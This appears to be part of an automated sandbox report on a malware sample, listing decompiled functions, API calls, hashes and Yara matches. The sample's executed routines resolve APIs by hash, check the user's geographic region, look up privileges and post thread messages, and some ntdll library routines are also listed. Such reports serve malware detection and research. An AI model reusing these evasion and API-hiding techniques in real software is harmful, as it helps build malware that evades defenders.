                                                    • Opcode ID: c020d1a2287affc1ed48a0c2e2398d71dd3f2eff2b918c1e952539264cac836d
                                                    • Instruction ID: ab9092f65f88e7c0655183512ae3de668fd2dc8a75314ffb857419d647d6e073
                                                    • Opcode Fuzzy Hash: c020d1a2287affc1ed48a0c2e2398d71dd3f2eff2b918c1e952539264cac836d
                                                    • Instruction Fuzzy Hash: 4F90026526180042D30065794C14B07100597D0343F51C126A0154564CC9558861A561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6a2331e3f64ea5228ccc5d773338879145014eebcd8cd3711ab7c3e4c5fcfa66
                                                    • Instruction ID: c20d8af22470d35876ffae0bb46b2a043ceb7ff2ecee740579b106ec460da8c1
                                                    • Opcode Fuzzy Hash: 6a2331e3f64ea5228ccc5d773338879145014eebcd8cd3711ab7c3e4c5fcfa66
                                                    • Instruction Fuzzy Hash: 6D90026535100003D240716954186065005E7E1341F51D022E0414564CD9558856A262
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f49d90c80c0d3f64987243a2b5bd0a96caad7da04e894ed9ddd0ef0fafb2d13b
                                                    • Instruction ID: 8f43aad336343eaed1803fc4d860d2a2ec7d09a8f81e38ca8516e095730eb273
                                                    • Opcode Fuzzy Hash: f49d90c80c0d3f64987243a2b5bd0a96caad7da04e894ed9ddd0ef0fafb2d13b
                                                    • Instruction Fuzzy Hash: 7290026D26300002D2807169540860A100597D1342F91D426A0015568CC9558869A361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3efcc90026bc24b561379373d774f1ed6dc95ad63f2fe44e51267bb5a8d34995
                                                    • Instruction ID: 652eab03134a7dd0623b0ab2ba14896870c0694fbc931df029c569de53aebfc3
                                                    • Opcode Fuzzy Hash: 3efcc90026bc24b561379373d774f1ed6dc95ad63f2fe44e51267bb5a8d34995
                                                    • Instruction Fuzzy Hash: BE90027536114402D21061698404706100597D1341F51C422A0824568D86D58891B162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a6fbb64cca22bfbfaad8526de863e61ce368abfc0464ddbbc5b1472c575de09e
                                                    • Instruction ID: f2211809831cf843a871e4edd5630934374d4518c023bb16ae82aa7d253b88d6
                                                    • Opcode Fuzzy Hash: a6fbb64cca22bfbfaad8526de863e61ce368abfc0464ddbbc5b1472c575de09e
                                                    • Instruction Fuzzy Hash: 2290027525100402D20065A95408646100597E0341F51D022A5024565EC6A58891B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E943 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                                    C-Code - Quality: 100%
                                                    			E0041E943(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                    0x0041e946
                                                    0x0041e95d
                                                    0x0041e96b

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: w5@
                                                    • API String ID: 621844428-2048009441
                                                    • Opcode ID: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                    • Instruction ID: 28662ead1a8a2610f8e7ad364a80deeb4b3648c83f3036173ff49b3b7ba48b6c
                                                    • Opcode Fuzzy Hash: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                    • Instruction Fuzzy Hash: CAD01776A003147BCA20EB99CC85FD777ACDF457A4F0180A5BA4C5B282C675BA00C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E935 Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 21%
                                                    			E0041E935() {

				asm("daa");
				asm("int 0xa2");
				asm("loope 0xffffff9e");
				asm("stc");
				_push(0x9f547df3);
				_t7 =  *0xFFFFFFFF8BEC8B5D;
				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
				ExitProcess( *0xFFFFFFFF8BEC8B61);
			}



                                                    0x0041e935
                                                    0x0041e938
                                                    0x0041e93a
                                                    0x0041e93c
                                                    0x0041e93d
                                                    0x0041e946
                                                    0x0041e95d
                                                    0x0041e96b

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateExitHeapProcess
                                                    • String ID:
                                                    • API String ID: 1054155344-0
                                                    • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                    • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                                    • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                    • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004098A3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 84%
                                                    			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420213( &_v67, 0, 0x3f);
				E00420CC3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                    0x004098a3
                                                    0x004098b4
                                                    0x004098b8
                                                    0x004098c3
                                                    0x004098c8
                                                    0x004098d3
                                                    0x004098eb
                                                    0x004098f0
                                                    0x004098f7
                                                    0x004098f9
                                                    0x00409906
                                                    0x0040990a
                                                    0x00000000
                                                    0x0040992e
                                                    0x0040990a
                                                    0x00409936

                                                    APIs
                                                    • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                    • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                                    • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                    • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E8F5 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                    • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                                    • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                    • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                                    C-Code - Quality: 100%
                                                    			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041e8d2
                                                    0x0041e8da
                                                    0x0041e8f0
                                                    0x0041e8f4

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                    • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                                    • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                    • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004100A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                                    C-Code - Quality: 37%
                                                    			E004100A3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                    0x004100bd
                                                    0x004100c7
                                                    0x004100cd
                                                    0x004100dc
                                                    0x004100ca
                                                    0x004100ca
                                                    0x004100ca

                                                    APIs
                                                    • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: User
                                                    • String ID:
                                                    • API String ID: 765557111-0
                                                    • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                    • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                                    • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                    • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E903 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                    • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                                    • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                    • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041EA63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041ea7d
                                                    0x0041ea93
                                                    0x0041ea97

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                    • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                                    • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                    • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: be26511fb111c8801e37ef213ce8458de14d67d73ddaf9a1d17aeb768c07098d
                                                    • Instruction ID: a3ef303c44f6f9dbe0f9b83ea24c2ef8662500b7eb8b28e738ee8df7cb61ecba
                                                    • Opcode Fuzzy Hash: be26511fb111c8801e37ef213ce8458de14d67d73ddaf9a1d17aeb768c07098d
                                                    • Instruction Fuzzy Hash: A8B092B29424C5CAEB11E7B04A0CB2B7A40BBE0741F27C066E2030695A4778C4A1F6BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00B3B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    • *** then kb to get the faulting stack, xrefs: 00B3B51C
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B3B484
                                                    • <unknown>, xrefs: 00B3B27E, 00B3B2D1, 00B3B350, 00B3B399, 00B3B417, 00B3B48E
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B3B323
                                                    • The resource is owned shared by %d threads, xrefs: 00B3B37E
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B3B39B
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B3B53F
                                                    • The instruction at %p tried to %s , xrefs: 00B3B4B6
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B3B476
                                                    • a NULL pointer, xrefs: 00B3B4E0
                                                    • an invalid address, %p, xrefs: 00B3B4CF
                                                    • The critical section is owned by thread %p., xrefs: 00B3B3B9
                                                    • *** enter .exr %p for the exception record, xrefs: 00B3B4F1
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B3B47D
                                                    • read from, xrefs: 00B3B4AD, 00B3B4B2
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B3B2DC
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 00B3B48F
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B3B314
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B3B3D6
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 00B3B352
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B3B305
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B3B38F
                                                    • This failed because of error %Ix., xrefs: 00B3B446
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B3B2F3
                                                    • Go determine why that thread has not released the critical section., xrefs: 00B3B3C5
                                                    • The instruction at %p referenced memory at %p., xrefs: 00B3B432
                                                    • The resource is owned exclusively by thread %p, xrefs: 00B3B374
                                                    • write to, xrefs: 00B3B4A6
                                                    • *** Inpage error in %ws:%s, xrefs: 00B3B418
                                                    • *** enter .cxr %p for the context, xrefs: 00B3B50D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 3680b5769eb9dd93523b9ccb75cd90a6914547c8c7160194f2b2eae61695c683
                                                    • Instruction ID: c0839f97b6d00a2e9a96d5ed8ecb3731f69dd737a02667370f2aa3d5f8524f77
                                                    • Opcode Fuzzy Hash: 3680b5769eb9dd93523b9ccb75cd90a6914547c8c7160194f2b2eae61695c683
                                                    • Instruction Fuzzy Hash: 07810575A40210FFCB226B058C87DAB3BB6EF96B51F91C0C4F2082B297D3618951D7B6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B41C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E00B41C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A8B150();
				} else {
					E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb7589c);
				E00A8B150("Heap error detected at %p (heap handle %p)\n",  *0xb758a0);
				_t27 =  *0xb75898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B41E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A8B150();
				} else {
					E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A8B150("Error code: %d - %s\n",  *0xb75898);
				_t113 =  *0xb758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A8B150("Parameter1: %p\n",  *0xb758a4);
				}
				_t115 =  *0xb758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A8B150("Parameter2: %p\n",  *0xb758a8);
				}
				_t117 =  *0xb758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A8B150("Parameter3: %p\n",  *0xb758ac);
				}
				_t119 =  *0xb758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A8B150();
					} else {
						E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb758b4);
					E00A8B150("Last known valid blocks: before - %p, after - %p\n",  *0xb758b0);
				} else {
					_t120 =  *0xb758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A8B150();
				} else {
					E00A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A8B150("Stack trace available at %p\n", 0xb758c0);
			}











                                                    0x00b41c10
                                                    0x00b41c16
                                                    0x00b41c1e
                                                    0x00b41c3d
                                                    0x00b41c3e
                                                    0x00b41c20
                                                    0x00b41c35
                                                    0x00b41c3a
                                                    0x00b41c44
                                                    0x00b41c55
                                                    0x00b41c5a
                                                    0x00b41c65
                                                    0x00b41c67
                                                    0x00000000
                                                    0x00b41c6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b41c67
                                                    0x00b41cdc
                                                    0x00b41ce5
                                                    0x00b41d04
                                                    0x00b41d05
                                                    0x00b41ce7
                                                    0x00b41cfc
                                                    0x00b41d01
                                                    0x00b41d0b
                                                    0x00b41d17
                                                    0x00b41d1f
                                                    0x00b41d25
                                                    0x00b41d30
                                                    0x00b41d4f
                                                    0x00b41d50
                                                    0x00b41d32
                                                    0x00b41d47
